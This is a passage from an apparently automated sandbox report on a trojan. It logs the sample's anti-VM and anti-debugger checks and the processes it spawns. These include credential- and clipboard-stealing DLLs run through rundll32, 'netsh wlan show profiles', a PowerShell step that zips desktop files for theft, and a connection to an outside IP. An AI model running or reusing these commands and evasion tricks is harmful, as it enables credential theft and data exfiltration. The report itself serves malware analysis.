Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 5948 Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 6904 Thread sleep count: 81 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 6904 Thread sleep count: 46 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 6904 Thread sleep count: 97 > 30
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe TID: 4496 Thread sleep count: 105 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 2764 Thread sleep count: 64 > 30
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Last function: Thread delayed
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Last function: Thread delayed
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Last function: Thread delayed
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\OneDrive\desktop.ini Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\Videos\desktop.ini Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\Music\desktop.ini Jump to behavior
Source: explorha.exe, explorha.exe, 00000002.00000002.1747528068.000000000067F000.00000040.00000001.01000000.00000008.sdmp, explorha.exe, 00000006.00000002.2895332014.000000000067F000.00000040.00000001.01000000.00000008.sdmp, ad0e9cf6d6.exe, 0000000E.00000002.2892507587.00000000003CF000.00000040.00000001.01000000.0000000D.sdmp, MPGPH131.exe, 00000013.00000002.2892343605.0000000000C6F000.00000040.00000001.01000000.00000010.sdmp, MPGPH131.exe, 00000014.00000002.2893211129.0000000000C6F000.00000040.00000001.01000000.00000010.sdmp, ad0e9cf6d6.exe, 00000016.00000002.2892406718.00000000003CF000.00000040.00000001.01000000.0000000D.sdmp, amert.exe, 00000018.00000002.2571780914.000000000068F000.00000040.00000001.01000000.00000011.sdmp, explorgu.exe, 00000019.00000002.2602792989.000000000034F000.00000040.00000001.01000000.00000012.sdmp, RageMP131.exe, 0000001A.00000002.2892518126.00000000010FF000.00000040.00000001.01000000.00000013.sdmp, ad0e9cf6d6.exe, 0000001B.00000002.2892342399.00000000003CF000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: ad0e9cf6d6.exe, 0000001B.00000003.2690881000.0000000000D15000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b
Source: MPGPH131.exe, 00000014.00000002.2899702692.000000000121B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ?\#disk&ven_vmware&prouask#4&1656f219&0&0000f5-b6bf-11d0-94f2-00a08b
Source: RageMP131.exe, 0000001C.00000002.2892698190.0000000000A82000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: rundll32.exe, 00000008.00000002.2450226998.000002E1743E1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW.
Source: ad0e9cf6d6.exe, 0000001B.00000002.2899906301.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&l
Source: ad0e9cf6d6.exe, 0000000E.00000002.2899511665.0000000001587000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: ad0e9cf6d6.exe, 00000016.00000002.2901115112.00000000013DD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}<
Source: explorha.exe, 00000006.00000002.2904871906.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWIC;
Source: explorha.exe, 00000006.00000002.2904871906.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2450226998.000002E1743E1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2450226998.000002E174328000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.2892509768.0000000002E09000.00000004.00000020.00020000.00000000.sdmp, ad0e9cf6d6.exe, 0000000E.00000002.2899511665.00000000015B9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000002.2899823054.0000000001568000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000002.2899823054.0000000001537000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2899702692.000000000124D000.00000004.00000020.00020000.00000000.sdmp, ad0e9cf6d6.exe, 00000016.00000002.2901115112.0000000001401000.00000004.00000020.00020000.00000000.sdmp, ad0e9cf6d6.exe, 00000016.00000002.2901115112.0000000001419000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: ad0e9cf6d6.exe, 0000000E.00000002.2899511665.0000000001587000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW(
Source: MPGPH131.exe, 00000014.00000003.2462757282.0000000001225000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}8
Source: RageMP131.exe, 0000001C.00000002.2892698190.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBn
Source: RageMP131.exe, 0000001C.00000003.2773831202.0000000000A84000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: MPGPH131.exe, 00000013.00000002.2899823054.0000000001547000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}m
Source: MPGPH131.exe, 00000013.00000002.2899823054.00000000014DD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&[
Source: netsh.exe, 00000009.00000002.2367337414.00000178B7287000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000009.00000003.2366894852.00000178B7284000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: RageMP131.exe, 0000001A.00000002.2900005103.0000000001AF8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWd
Source: RageMP131.exe, 0000001C.00000002.2892698190.0000000000A10000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&
Source: MPGPH131.exe, 00000013.00000003.2460839915.0000000001545000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: n_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: ad0e9cf6d6.exe, 00000016.00000002.2901115112.00000000013E3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}*
Source: ad0e9cf6d6.exe, 0000001B.00000002.2899906301.0000000000D00000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWXx
Source: ad0e9cf6d6.exe, 00000016.00000003.2526875239.00000000013E5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}>
Source: ad0e9cf6d6.exe, 0000000E.00000002.2899511665.000000000159E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-
Source: MPGPH131.exe, 00000013.00000003.2460839915.000000000154D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}y
Source: explorha.exe, 00000006.00000002.2904871906.0000000000A96000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW 5
Source: MPGPH131.exe, 00000014.00000002.2899702692.000000000120C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWHV%
Source: ad0e9cf6d6.exe, 0000001B.00000002.2899906301.0000000000D13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Z
Source: MPGPH131.exe, 00000014.00000002.2899702692.000000000124D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWL
Source: SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe, 00000000.00000002.1733642258.0000000000CFF000.00000040.00000001.01000000.00000003.sdmp, explorha.exe, 00000001.00000002.1730743577.000000000067F000.00000040.00000001.01000000.00000008.sdmp, explorha.exe, 00000002.00000002.1747528068.000000000067F000.00000040.00000001.01000000.00000008.sdmp, explorha.exe, 00000006.00000002.2895332014.000000000067F000.00000040.00000001.01000000.00000008.sdmp, ad0e9cf6d6.exe, 0000000E.00000002.2892507587.00000000003CF000.00000040.00000001.01000000.0000000D.sdmp, MPGPH131.exe, 00000013.00000002.2892343605.0000000000C6F000.00000040.00000001.01000000.00000010.sdmp, MPGPH131.exe, 00000014.00000002.2893211129.0000000000C6F000.00000040.00000001.01000000.00000010.sdmp, ad0e9cf6d6.exe, 00000016.00000002.2892406718.00000000003CF000.00000040.00000001.01000000.0000000D.sdmp, amert.exe, 00000018.00000002.2571780914.000000000068F000.00000040.00000001.01000000.00000011.sdmp, explorgu.exe, 00000019.00000002.2602792989.000000000034F000.00000040.00000001.01000000.00000012.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: rundll32.exe, 0000000D.00000002.2892509768.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, ad0e9cf6d6.exe, 00000016.00000002.2901115112.00000000013D0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@
Source: ad0e9cf6d6.exe, 0000000E.00000002.2899511665.0000000001587000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Thread information set: HideFromDebugger
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Thread information set: HideFromDebugger
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Thread information set: HideFromDebugger
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_05000D4A rdtsc 0_2_05000D4A
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_00B37BBB mov eax, dword ptr fs:[00000030h] 0_2_00B37BBB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_00B3B922 mov eax, dword ptr fs:[00000030h] 0_2_00B3B922
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_004BB922 mov eax, dword ptr fs:[00000030h] 1_2_004BB922
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_004B7BBB mov eax, dword ptr fs:[00000030h] 1_2_004B7BBB
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_004BB922 mov eax, dword ptr fs:[00000030h] 2_2_004BB922
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_004B7BBB mov eax, dword ptr fs:[00000030h] 2_2_004B7BBB
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 193.233.132.56 80
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe "C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe "C:\Users\user\AppData\Local\Temp\1000049001\amert.exe" Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal Jump to behavior
Source: SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe, SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe, 00000000.00000002.1734062773.0000000000D47000.00000040.00000001.01000000.00000003.sdmp, explorha.exe, explorha.exe, 00000002.00000002.1747986620.00000000006C7000.00000040.00000001.01000000.00000008.sdmp Binary or memory string: Program Manager
Source: ad0e9cf6d6.exe, 0000000E.00000002.2892507587.00000000003CF000.00000040.00000001.01000000.0000000D.sdmp, MPGPH131.exe, 00000013.00000002.2892343605.0000000000C6F000.00000040.00000001.01000000.00000010.sdmp, MPGPH131.exe, 00000014.00000002.2893211129.0000000000C6F000.00000040.00000001.01000000.00000010.sdmp Binary or memory string: MProgram Manager
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000051001\b977f667d6.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\DTBZGIOOSO.docx VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\ONBQCLYSPU.docx VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\VLZDGUKUTZ.xlsx VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\XZXHAVGRAG.docx VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\XZXHAVGRAG.xlsx VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
